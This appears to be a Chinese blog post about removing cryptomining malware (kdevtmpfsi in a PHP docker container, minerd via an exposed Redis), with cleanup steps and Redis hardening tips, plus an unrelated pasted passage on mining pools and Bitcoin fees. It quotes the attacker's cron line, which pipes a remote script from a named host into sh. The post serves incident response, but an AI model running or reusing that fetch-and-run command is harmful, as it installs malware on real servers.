解决挖矿病毒的经历

线上一台服务器，CPU高达90%以上，经过top 分析出进程kdevtmpfsi

kill -9 杀死进程无果，很快就会自动恢复

排查步骤：

结果：

病毒被植入到了线上运行的某一docker容器内。

如何先确定是哪一容器再去删除搜索结果中的病毒文件？

我这台机器跑的容器不多，可以用复制文件的方法，先 docker cp 一个文件到容器中。再去find 这个文件

如果结果还是在刚才搜索病毒的那个文件目录下（/var/lib/docker/devicemapper/mnt/xxxxx ）就可以确定容器了。结果是php的容器出现了问题。

知道是具体是什么容器出现了问题，最快的办法就是先重启一个新的容器。

我这边是nginx +php 两种服务容器，所以先启动了一个新php容器，修改nginx中配置文件代理后端php服务器端口为新容器的IP地址。（nginx容器已经映射目录到宿主机）

修改PHP后端IP地址

cd 宿主机映射nginx的配置文件位置目录

测试线上环境正常后，删除原来的php容器。（这是自然也==直接删除了病毒文件）

执行 TOP命令，CPU占用正常。

平时防火墙和sellinux都关闭的话，服务器不要暴漏太多无用端口，出现问题应该最新通过进程名去查找文件的原始位置去分析问题，遇到挖矿病毒也应该多注意/etc/init.d下和cron计划任务有无异常。

后期也可以写个cron或者脚本

要在全网算力提升到了一定程度后，过低的获取奖励的概率，促使一些“bitcointalk”上的极客开发出一种可以将少量算力合并联合运作的方法，使用这种方式建立网站。

在此机制中，不论个人矿工所能使用的运算力多寡，只要是透过加入矿池来参与挖矿活动，无论是否有成功挖掘出有效资料块，皆可经由对矿池的贡献来获得少量比特币奖励，亦即多人合作挖矿，获得的比特币奖励也由多人依照贡献度分享。

截止2019年1月，全球算力排名前五的比特币矿池有：BTC.com 、Poolin、AntPool、slush pool、、F2Pool，目前全球约70%的算力在中国矿工手中。

扩展资料：

手续费：

比特币矿工会对大部分交易收取少量费用，其主要目的是防止有人大量发送无聊的小额交易，浪费网络资源。当前每笔交易的手续费大部分是฿ 0.0001/KB(0.0001btc/KB)，实际上0.9.0以后的版本将默认手续费降为฿ 0.00001/KB(0.00001 btc/KB)。

因为大部分交易占用的数据量都小于1千字节，所以一般情况下฿ 0.00001(0.00001 btc/KB)的手续费就足够了。同时，在将来比特币区块奖励较少时，手续费将成为矿工收入的主要来源，比特币的手续费会与该交易占用的字节数相关。

目前比特币系统中手续费的计算标准并非强制性的，因此使用者也可以在交易进行时不给予任何手续费；

但大多数矿工在组建资料块时通常会优先考虑带有较高手续费的交易，以便在挖矿成功时能获得较高的报酬，因此无附带任何手续费的交易，可能会需要等待较长的时间才能被处理并纳入区块链中。

此外，现在因为区块容量上限1MB以及近期比特币交易量大增的因素，手续费大幅上涨，而且等待交易被确认的时间也变长了许多。

参考资料来源：百度百科-矿池

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh

病毒文件内容如下，感兴趣的可以研究下：

View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.

配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.

配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度

好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf

2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

---